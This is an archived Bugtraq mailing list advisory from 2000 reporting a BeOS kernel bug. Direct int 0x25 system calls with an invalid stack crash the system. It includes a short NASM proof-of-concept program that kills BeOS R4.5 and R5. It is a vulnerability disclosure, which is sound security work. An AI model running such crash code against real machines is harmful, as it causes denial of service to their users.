Home page logo
/

bugtraq logo Bugtraq mailing list archives

BeOS syscall bug
From: konst () LINUXASSEMBLY ORG (Konstantin Boldyshev)
Date: Mon, 10 Apr 2000 13:16:28 -0000


Summary:

BeOS crashes when system call with invalid parameters is
issued.

Details:

When using direct kernel calls through int 0x25 (not
libroot.so functions) BeOS dies on most system calls with
invalid parameters/stack. Allthough Be has registered this
bug before R5.0, it is present in R5.0, and is present at
least in all R4.5.x
(http://bebugs.be.com/devbugs/detail.php3?oid=2324160).
No fix is available, it's a kernel bug.

Here's a sample assembly program that kills BeOS (nasm):

section .text
global _start

_start:

        push    dword msg
        push    dword len
        push    dword 1 ;stdout

        mov     eax,3   ;sys_write
        int     0x25    ;must be a *call* to int 0x25,
                        ;then everything goes ok; i.e.
                        ;return address must be on the stack,
                        ;but it is not

        mov     eax,0x3f        ;sys_exit
        int     0x25

msg     db      "hello",0xa
len     equ     $ - msg

(source and binary can be downloaded at
http://linuxassembly.org/BeDie.tgz)

References:

http://www.escribe.com/software/bedevtalk/ - BeDevTalk
archives
(Feb-Mar 2000, search for topics "assembly & BeOS", "system
calls", "system call stress testing"

http://linuxassembly.org - Linux/UNIX assembly programming
portal


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]